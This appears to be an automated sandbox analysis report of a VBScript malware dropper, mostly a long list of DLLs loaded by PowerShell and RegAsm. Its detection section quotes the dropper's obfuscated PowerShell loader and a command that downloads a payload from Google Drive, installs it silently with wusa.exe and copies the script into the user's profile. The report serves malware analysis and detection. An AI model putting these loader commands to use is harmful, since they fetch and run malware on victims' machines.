                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                    Data Obfuscation

                    barindex
                    VBScript performs obfuscated calls to suspicious functions
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell") : uwqxh.Run( "powershell -command ""$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65
                    .NET source code contains potential unpacker
                    Source: 4.2.powershell.exe.1bdb03863b0.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 4.2.powershell.exe.1bdc82e0000.2.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 4.2.powershell.exe.1bdb17aa240.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.1eb4d619c80.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.1eb4dee3608.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 18.2.powershell.exe.199616b0000.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 18.2.powershell.exe.199619d7e98.2.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 18.2.powershell.exe.199622abc98.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 23.2.powershell.exe.23e03d17d98.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Source: 23.2.powershell.exe.23e045e64b0.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn$glo
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + 